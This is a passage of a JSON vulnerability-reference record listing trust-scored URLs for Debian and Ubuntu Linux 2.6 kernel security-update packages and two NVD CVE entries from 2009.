        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2691"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
